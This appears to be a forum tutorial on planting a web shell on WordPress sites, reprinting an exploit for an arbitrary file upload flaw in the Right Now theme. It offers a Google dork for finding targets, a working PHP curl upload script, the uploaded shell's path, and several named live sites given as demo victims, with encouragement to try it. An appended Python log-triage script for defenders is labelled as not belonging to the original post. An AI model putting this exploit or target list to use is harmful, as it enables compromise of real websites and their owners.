Here's a small tutorial. It covers how to get a shell onto a website. Some of you probably know this already; this is for those who don't. There's no harm in trying it out, but putting the three names Elite_x, Cryp70n and www.synkoda.com on anything is forbidden.
Here is the video.
###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Cryp70n
# Date: 10/31/2013
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
= = = = = = = =
1)Exploit =
2)Real Demo = http://monroemartincomedy.com//wp-conten...index.html
= = = = = = = =
1)Exploit :
= = = = = =
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php
# #### #### #### #### #### #### #### #### #
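A defender's view of the advisory, as an added example that is not part of the original post: it triages a web server access log for POSTs to the upload endpoint and for requests to server-side scripts in the drop directory named above. The "combined" log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Paths taken from the advisory above; a site prefix such as /rightnowwp/ may precede them.
UPLOAD_ENDPOINT = "/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php"
DROP_DIR = "/wp-content/uploads/settingsimages/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(?:$|[?/.])", re.I)

# Apache/nginx "combined" access log format (assumed).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

SAMPLE = [  # constructed log lines using documentation-range IPs
    '203.0.113.7 - - [01/Nov/2013:10:00:01 +0000] "POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 12 "-" "curl"',
    '203.0.113.7 - - [01/Nov/2013:10:00:05 +0000] "GET /wp-content/uploads/settingsimages/a.php HTTP/1.1" 200 51 "-" "curl"',
    '198.51.100.9 - - [01/Nov/2013:10:01:00 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 900 "-" "Mozilla"',
    '198.51.100.23 - - [01/Nov/2013:10:02:00 +0000] "POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.1" 404 0 "-" "x"',
]

def triage(lines):
    """Return {ip: {"uploads": [...], "script_hits": [...]}} for suspicious clients."""
    hits = defaultdict(lambda: {"uploads": [], "script_hits": []})
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue
        path = m["path"]
        # Any POST to the upload endpoint named in the advisory.
        if m["method"] == "POST" and UPLOAD_ENDPOINT in path:
            hits[m["ip"]]["uploads"].append((m["ts"], m["status"]))
        # Any request for a server-side script inside the image drop directory.
        elif DROP_DIR in path and SCRIPT_EXT.search(path.split(DROP_DIR, 1)[1]):
            hits[m["ip"]]["script_hits"].append((m["ts"], path, m["status"]))
    return dict(hits)

def confirmed(report):
    """IPs that posted to the endpoint and also got a 200 for a script in the drop directory."""
    return sorted(ip for ip, r in report.items()
                  if r["uploads"] and any(s == "200" for _, _, s in r["script_hits"]))
```

An IP returned by `confirmed()` is a strong signal that a script was written and then executed; the drop directory on disk should then be checked for non-image files and the theme's upload script removed or blocked.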
Did you watch it?
Leave a comment before you go, won't you.....